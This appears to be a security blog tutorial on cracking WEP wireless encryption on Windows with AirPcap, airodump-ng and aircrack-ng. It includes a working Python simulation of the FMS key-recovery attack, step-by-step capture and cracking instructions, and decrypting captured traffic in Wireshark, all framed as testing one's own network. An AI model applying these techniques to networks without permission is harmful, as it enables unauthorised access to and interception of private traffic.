This guide demonstrates how to crack WEP in Windows using the AirPcap Wireless Capture Adapter.
To do this, you’ll need the useful AirPcap USB Wireless Capture Adapter from CACE Technologies. It’s pretty cheap when compared to some of the other Windows hardware solutions, and you’ll be supporting the makers of Wireshark!
I adore Linux and the entire Open Source movement, but it’s important to recognise that many people out there are locked into Windows; and learning an entirely new OS to perform security testing isn’t cost-effective for their company.
How is WEP cracked?
To crack WEP, you exploit a weakness in the way it uses RC4, and to do that you need to collect a large number of Initialisation Vectors (IVs). In normal WLAN traffic it would take quite a while to pick up enough IVs, roughly 1 million for the older statistical (FMS/KoreK) attacks against a 104-bit key (later aircrack-ng releases with the PTW attack need far fewer, in the tens of thousands), so we need to generate our own traffic. There are two ways we could do this:
- Generate your own traffic using iperf.
- Use packet injection with aireplay-ng.
At present, the AirPcap Drivers do not support packet injection in Windows. Fortunately, the makers of AirPcap, CACE Technologies, have said packet injection will be included soon.
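To make that "weakness in its implementation" concrete, here is a small simulation of the FMS attack that the statistical WEP crackers are built on. It is an added example, not part of the original post and not aircrack-ng's code: the 40-bit key, the weak IVs of the form (A+3, 255, X) and the payload are all constructed here. The attacker recovers the first keystream byte of every frame because every frame starts with the LLC/SNAP byte 0xAA, filters for IVs that leave the RC4 key schedule in a "resolved" state, and votes on each key byte in turn; the fudge-factor search and the ICV check at the end mirror what a real cracker does when the votes are close, which is also why too few IVs produce no key rather than a wrong one.

```python
"""Simulated FMS attack on WEP. Added example: the key, IVs and payload below are
constructed for illustration, not taken from a real capture or from aircrack-ng."""
import random
import zlib

SNAP = b"\xaa\xaa\x03\x00\x00\x00\x08\x00"   # LLC/SNAP header on every IP frame
WEP_KEY = b"\x1f\x8b\x3c\x5e\x07"            # constructed 40-bit key the demo AP uses


def rc4_ksa(key, rounds=256):
    """RC4 key scheduling. rounds < 256 returns the partial state FMS reasons about."""
    s, j = list(range(256)), 0
    for i in range(rounds):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s, j


def rc4_keystream(key, n):
    """First n bytes of RC4 output for key."""
    s, _ = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key, iv, plaintext):
    """WEP body: RC4(IV || key) applied to plaintext || CRC-32 ICV; the IV is sent in clear."""
    body = plaintext + zlib.crc32(plaintext).to_bytes(4, "little")
    ks = rc4_keystream(iv + key, len(body))
    return iv + b"\x00" + bytes(a ^ b for a, b in zip(body, ks))   # byte 3 = key index 0


def wep_decrypt_ok(key, frame):
    """Decrypt with a candidate key and check the ICV: how a cracker confirms a key."""
    iv, ct = frame[:3], frame[4:]
    body = bytes(a ^ b for a, b in zip(ct, rc4_keystream(iv + key, len(ct))))
    return zlib.crc32(body[:-4]).to_bytes(4, "little") == body[-4:]


def build_capture(key, ordinary=500, seed=1):
    """Constructed traffic: the FMS weak IVs (A+3, 255, X) for every key byte A,
    plus ordinary random IVs, each encrypting the same small IP-like payload."""
    rng = random.Random(seed)
    payload = SNAP + bytes(range(20))
    frames = [wep_encrypt(key, bytes([a + 3, 255, x]), payload)
              for a in range(len(key)) for x in range(256)]
    frames += [wep_encrypt(key, bytes(rng.getrandbits(8) for _ in range(3)), payload)
               for _ in range(ordinary)]
    rng.shuffle(frames)
    return frames


def fms_votes(frames, known):
    """Vote on secret key byte A = len(known). Only frames whose IV leaves the KSA
    'resolved' after A+3 steps (S[1] < A+3 and S[1] + S[S[1]] == A+3) are counted;
    for those, the first keystream byte equals S[A+3] about 5% of the time, which is
    enough to make the right byte win once a few hundred weak IVs have been seen."""
    a = len(known)
    votes = [0] * 256
    for frame in frames:
        s, j = rc4_ksa(frame[:3] + known, a + 3)     # only the IV and recovered bytes are needed
        x = s[1]
        if x >= a + 3 or (x + s[x]) & 0xFF != a + 3:
            continue
        z = frame[4] ^ SNAP[0]                        # keystream byte 0 via the known plaintext
        votes[(s.index(z) - j - s[a + 3]) & 0xFF] += 1
    return votes


def crack_wep(frames, key_len, fudge=3, known=b""):
    """Depth-first search over the top `fudge` vote winners per byte (the cracker's
    fudge factor); a full key counts only if it decrypts a frame with a valid ICV."""
    if len(known) == key_len:
        return known if wep_decrypt_ok(known, frames[0]) else None
    votes = fms_votes(frames, known)
    for b in sorted(range(256), key=lambda c: -votes[c])[:fudge]:
        key = crack_wep(frames, key_len, fudge, known + bytes([b]))
        if key is not None:
            return key
    return None


if __name__ == "__main__":
    capture = build_capture(WEP_KEY)
    print("captured frames:", len(capture))
    print("recovered key:", crack_wep(capture, len(WEP_KEY)).hex())
```

Only 256 of the 1,780 constructed frames per key byte are weak in the FMS sense, and only about one in twenty of those casts a correct vote; that ratio is why a real capture needs so many IVs, and why aircrack-ng's KoreK and PTW modes, which exploit many more IV classes than this one, get by with fewer.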
What will you need?
- An AirPcap Wireless Capture adapter. This is a great little tool for 802.11 sniffing in Windows. You can even run Kismet with it!
- The Aircrack-ng for AirPcap release by CACE Technologies.
- Your own Wireless Access Point, configured with WEP.
- 3 computers: one to run the AirPcap capture, and two to generate traffic across the WLAN, at least one of which needs a Wireless LAN adapter (otherwise the iperf traffic never goes over the air and produces no IVs).
- Enough traffic to generate over 1 million IVs. For this demonstration, we’ll use a Windows release of iperf, called K-perf, to generate lots of traffic.
Let’s get cracking
This guide assumes that you are performing this on a WLAN you have permission to use.
OK let’s do it…
Set up Aircrack
Plug in your AirPcap.
Extract the contents of the aircrack-ng release to C:\aircrack (or wherever, I’m just doing this for tidiness).
Open up the c:\aircrack\bin\ directory and double-click airodump-ng.exe (this is a specially built release tailored for AirPcap).
Configure it for your setup: the AirPcap adapter, the channel your AP is on, and an output filename prefix (this guide uses crackme). [Screenshot: Configuring Airodump-ng]
Generate some traffic
Install K-perf, then run J-perf (the Java front-end) on the two machines connected to the AP. At least one should be connected via wireless. Set one up as a server and the other as a client. Remember, we're just doing this to generate enough traffic on our demo WLAN.
On the Server, choose the ‘Server’ option, then click Run. [Screenshot: Server, Configure K-perf using the Java front-end, J-perf.]
On the Client, type in the Server's IP address, set the time iperf should run to 1200 seconds (20 minutes), and click Run. [Screenshot: Client, Configure K-perf]
Capture and Crack
Go back to your AirPcap machine and watch the IV frames come in. [Screenshot: Airodump-ng capturing WEP IVs]
When the data-frame count shown by airodump-ng passes 1,000,000 (those are the frames that carry IVs; beacons and other management frames don't count), open up aircrack-ng_GUI.exe in the c:\aircrack\bin\ directory.
Click the Aircrack-ng tab, and locate your crackme.ivs file (the output prefix you gave airodump-ng, with the .ivs extension). If airodump-ng saw more than one network, restrict the cracker to your own AP's BSSID so that IVs from other networks don't pollute the statistics.
Click Launch and wait for the cracker to find your WEP key. [Screenshot: Aircrack-ng cracking WEP]
If aircrack-ng cannot find your WEP key, you probably don't have enough IVs yet: the attack is statistical, and key bytes whose vote counts are close can only be separated by more data. To get more IVs, start up airodump-ng.exe again and, when asked for the output filename prefix, give the same name as before; airodump-ng will then append packets to the original dump. (From the command line, aircrack-ng.exe also accepts more than one capture file, so a second dump under a new name works just as well.)
As this is a simulation, now that you have your WEP key you can continue your penetration testing by using AirPcap with Wireshark to capture the traffic flowing over the WLAN; enter the key in Wireshark's IEEE 802.11 protocol preferences and it will decrypt the WEP frames for you. (A WPA/WPA2-PSK network can only be decrypted this way if you know the passphrase and have also captured the client's four-way handshake.)
As one of the aims of my blog is to help people: if you have friends, neighbours or co-workers whose WLANs are WEP-enabled, you could, with their permission, demonstrate how easy it is to crack WEP, and then help them set up a properly-implemented WPA/WPA2 WLAN.
Did this help you at all? Any questions? Feel free to leave me a comment below!